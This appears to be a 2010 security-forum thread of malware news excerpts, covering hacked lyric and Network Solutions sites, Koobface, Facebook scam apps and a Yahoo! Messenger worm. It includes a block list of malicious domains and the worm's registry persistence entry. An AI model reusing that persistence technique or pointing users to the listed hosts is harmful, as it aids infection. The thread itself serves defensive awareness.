- http://www.h-online.com/security/news/item/Java-vulnerability-when-lyric-sites-attack-Update-978283.html
15 April 2010 - "... songlyrics .com... site appears to have been hacked by criminals who have embedded a program to download malicious code from a Russian web server... According to analysis by Wepawet... the attackers are not just exploiting the Java vulnerability, but also multiple vulnerabilities in Adobe Reader... fixed 15 vulnerabilities in Reader with update 9.3.2..."
Java JRE 6 Update 20 update released
- http://java.sun.com/javase/downloads/index.jsp
April 15, 2010
Adobe Reader and Acrobat v9.3.2 update released
- http://www.adobe.com/support/security/bulletins/apsb10-09.html
April 13, 2010
- http://google.com/safebrowsing/diagnostic?site=songlyrics.com/
"... 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-17, and the last time suspicious content was found on this site was on 2010-04-14..."
- http://thompson.blog.avg.com/2010/04/heads-up-0day-itw-rihanna-is-a-lure.html
April 14, 2010 - "... So far, it's not in any of the exploit kits, as far as we can see, but it's a given that it soon will be..."
:fear::confused::sad:
AplusWebMaster
2010-04-19, 12:16
FYI...
Network Solutions hacked again
- http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html
April 18, 2010 - "Network Solutions is getting hacked again. Just today we were notified of more than 50 sites hacked with... malware javascript... it is injecting this iframe from http ://corpadsinc .com/grep/ *... this time we are seeing all kind of sites hacked. From Wordpress, Joomla to just simple HTML sites..."
(More detail and updates at the URL above.)
* http://google.com/safebrowsing/diagnostic?site=corpadsinc.com/
"... Site is listed as suspicious - visiting this web site may harm your computer... The last time Google visited this site was on 2010-04-19, and the last time suspicious content was found on this site was on 2010-04-19. Malicious software includes 9 exploit(s)... this site has hosted malicious software over the past 90 days. It infected 226 domain(s)..."
- http://isc.sans.org/diary.html?storyid=8647
Last Updated: 2010-04-18 21:47:10 UTC
- http://www.malwaredomains.com/wordpress/?p=935
April 18, 2010 - "Make sure the following domains are blocked or blacklisted:
binglbalts . com
corpadsinc .com
fourkingssports .com
networkads .net
mainnetsoll .com
sources: http://ddanchev.blogspot.com/2010/04/dissecting-wordpress-blogs-compromise.html ,
http://isc.sans.org/diary.html?storyid=8647 ."
- http://krebsonsecurity.com/2010/04/network-solutions-again-under-siege/
April 19, 2010
- http://stopmalvertising.com/malvertisements/corpadsinccom-redirecting-network-solutions-customers-again
April 19, 2010
- http://forums.spybot.info/showpost.php?p=367245&postcount=242
April 10, 2010
:fear::mad:
AplusWebMaster
2010-04-20, 17:58
FYI...
Bot installs adware with FLV video player
- http://sunbeltblog.blogspot.com/2010/04/bot-installs-adware-along-with-video.html
April 20, 2010 - "... investigating a botnet that auto installed FLV Direct Player. The player bundles Zugo Search adware, also known as LoudMo, on victims’ machines. FLV Direct is available freely on the web. The bot, however, uses an AutoIT script to script through the installation screens so the victim never sees the install... It also changes the victim machine’s home page to bing.zugo .com. Apparently this is some kind of affiliate operation – the malefactor affiliates get paid for installing LoudMo adware on the machines of unknowing victims and they just decided to do it wholesale with a botnet. Affiliates also are spamming heavily on Twitter (and who else knows where else) trying to get people to install the FLV Player..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2010-04-22, 18:50
FYI...
Twitter SPAM in your Inbox
- http://isc.sans.org/diary.html?storyid=8674
Last Updated: 2010-04-22 15:25:05 UTC - "... received several emails today "from" support@twitter .com (Of course they really aren't from support.). We are also receiving reports from our readers that they are seeing the same thing. The emails claim that you have unread messages from Twitter and contain a link that you can supposedly click on to view the messages. The links are to various locations other than Twitter. Don't be fooled. The emails are -not- from Twitter and the links are -not- at Twitter. Just a reminder NEVER click on links in emails. Always login to your account to check it out... contacted Twitter and reported the emails..."
:fear::mad:
AplusWebMaster
2010-04-29, 14:44
FYI...
Facebook - Koobface spreading campaign
- http://ddanchev.blogspot.com/2010/04/dissecting-koobface-gangs-latest.html
April 27, 2010 - "During the weekend... the Koobface gang... launched another spreading attempt across Facebook, with Koobface-infected users posting bogus video links on their walls.
> Recommended reading: 10 things you didn't know about the Koobface gang
- http://blogs.zdnet.com/security/?p=5452 [February 23, 2010]
What's particularly interesting about the campaign, is that the gang is now starting to publicly acknowledge its connections with xorg .pl* (Malicious software includes 40706 scripting exploit(s), 4119 trojan(s), 1897 exploit(s), with an actual subdomain residing there embedded on Koobface-serving compromised hosts..."
* http://www.google.com/safebrowsing/diagnostic?site=xorg.pl/
"... The last time Google visited this site was on 2010-04-29, and the last time suspicious content was found on this site was on 2010-04-29..."
:fear::mad::fear:
AplusWebMaster
2010-04-29, 23:09
FYI...
Undetectable Facebook Scams
- http://www.pcworld.com/article/195186/new_threat_undetectable_facebook_scams.html
Apr 28, 2010 - "... recently received two Facebook e-mail notifications... Nothing was obviously wrong with the e-mail messages, which said that my friend had tagged a photo of me and then commented on it. But something about a reference to an app named "Who stalks into your profile" just didn't feel right. So I checked it out. I dug into the e-mail header to make sure that it was from Facebook - it was. A search for the app's name didn't turn up any warnings. The app's installation page didn't give me any obvious clues, either. Still, I let my paranoia have its day, and I sat on the app. Sure enough, it was a scam, and an ingenious one. When anyone installed the supposed stalker app, it first created a photo montage of friends' images and then commented on that montage. Facebook duly sent out "your friend tagged a photo of you" messages, effectively advertising the scam app, which was created to generate illicit online ad revenue. Facebook, with its millions of users, has become a major target for online crooks who try to use malicious apps for everything from phishing to spam to a first step toward installing more dangerous malware onto your PC..."
:mad:
AplusWebMaster
2010-05-03, 04:27
FYI...
New Yahoo! Messenger worm
- http://www.symantec.com/connect/blogs/new-yahoo-messenger-worm
May 2, 2010 - "... new Yahoo! Messenger worm doing the rounds. Potential victims receive instant messages from contacts in their list, containing a link claiming to be a photo, which in reality points to a malicious executable... The page at the end of the link is basic and does not employ any exploits in order to install the worm, it relies solely on social engineering to trick victims into believing they are opening a picture from a friend, while in fact they run the worm... When the link is clicked, the default browser is redirected to the worm executable, which has a misleading name. Please note the file extension is actually “.exe”. In order to run, the worm still needs the user’s action to open/run the file. Once run, the worm copies itself to %WinDir%\infocard.exe, then it adds itself to the Windows Firewall List, stops the Windows Updates service and sets the following registry value so that it runs every time the system boots:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\“Firewall Administrating” = “%WinDir%\infocard.exe”
Then it looks for the Yahoo! Messenger application on the system, and sends out links to the worm to everyone in the contact list. It may also download and execute other malicious files. When run the first time, the worm will open a new page to the following address, so some photos eventually appear to the user, in order to mask the infection: browseusers.myspace .com/Browse/Browse.aspx Symantec detects and remediates this threat as W32.Yimfoca..."
(Screenshots available at the Symantec URL above.)
- http://www.internetnews.com/security/article.php/3880966/Messenger+Worm+Preys+On+Users+Trust.htm
May 7, 2010 - "... This latest socially engineered malware scam first appears as a friendly invite from a contact in a user's Yahoo Messenger account. What appears to be a smiley-faced invite to take a gander at some new photos is actually the first step down the slippery slope to becoming a botnet..."
:fear::mad: